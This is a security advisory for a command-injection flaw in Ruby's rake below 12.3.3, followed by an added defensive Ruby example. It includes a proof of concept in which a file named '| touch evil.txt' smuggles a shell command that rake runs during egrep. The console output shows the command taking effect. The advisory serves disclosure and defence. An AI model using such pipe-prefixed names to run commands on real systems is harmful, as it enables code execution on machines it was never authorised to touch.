- Snyk ID SNYK-RUBY-RAKE-552000
- published 24 Feb 2020
- disclosed 24 Feb 2020
- credit Katsuhiko Yoshida
How to fix?
Upgrade rake to version 12.3.3 or higher.
rake is a Make-like program implemented in Ruby.
Affected versions of this package are vulnerable to Arbitrary Code Injection in
Rake::FileList when a filename that begins with the pipe character (`|`) is supplied, for example to `Rake::FileList#egrep` as in the PoC below.
PoC by Katsuhiko Yoshida:

```console
% ls -1
Gemfile
Gemfile.lock
poc_rake.rb
vendor
| touch evil.txt
% bundle exec ruby poc_rake.rb
["poc_rake.rb", "Gemfile", "Gemfile.lock", "| touch evil.txt", "vendor"]
poc_rake.rb:6:list.egrep(/something/)
Error while processing 'vendor': Is a directory @ io_fillbuf - fd:7 vendor
% ls -1
Gemfile
Gemfile.lock
evil.txt
poc_rake.rb
vendor
| touch evil.txt
```
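The following is an added example, not code from rake, Snyk or the PoC author. It shows the defensive side of the issue: Ruby's `Kernel#open` spawns a command when a name begins with `|`, while `File.open` treats the same string as a literal path, so a filter that rejects pipe-prefixed names before they reach `Rake::FileList#egrep` on rake < 12.3.3, together with a grep that only ever uses `File.open`, keeps the PoC file name harmless. The helper names (`pipe_name?`, `partition_safe`, `safe_egrep`, `demo`) and the scratch-directory scenario are assumptions of this example.

```ruby
# Added example (not from rake, Snyk or the PoC author). Kernel#open treats a
# name beginning with "|" as a command to spawn; File.open treats it as a
# literal path. The helpers below screen untrusted names before they reach
# an API that may call Kernel#open (Rake::FileList#egrep on rake < 12.3.3)
# and grep files without ever going through Kernel#open.
require "tmpdir"

# True when Kernel#open would interpret the name as a pipeline.
def pipe_name?(name)
  name.to_s.start_with?("|")
end

# Split names into those safe to pass on and those to reject (and log).
def partition_safe(names)
  names.partition { |n| !pipe_name?(n) }
end

# Grep with File.open only: a pipe-prefixed name is read as a file (or
# fails with ENOENT), never executed. Returns [name, line_no, line] hits.
def safe_egrep(names, pattern)
  hits = []
  names.each do |fn|
    next unless File.file?(fn) # skip directories, cf. the 'Is a directory' error in the PoC
    File.open(fn, "r") do |f|
      f.each_line.with_index(1) do |line, no|
        hits << [fn, no, line.chomp] if pattern.match?(line)
      end
    end
  end
  hits
end

# Constructed scenario in a scratch directory, mirroring the PoC file name.
def demo
  Dir.mktmpdir do |dir|
    Dir.chdir(dir) do
      File.open("notes.txt", "w") { |f| f.write("nothing\nsomething here\n") }
      File.open("| touch evil.txt", "w") { |f| f.write("something else\n") }
      names = Dir.children(dir).sort
      _safe, rejected = partition_safe(names)
      { rejected: rejected,
        hits: safe_egrep(names, /something/),
        evil_created: File.exist?("evil.txt") }
    end
  end
end

puts demo.inspect
```

Running it shows the pipe-prefixed name being rejected by the filter, read as an ordinary file by `safe_egrep`, and no `evil.txt` appearing.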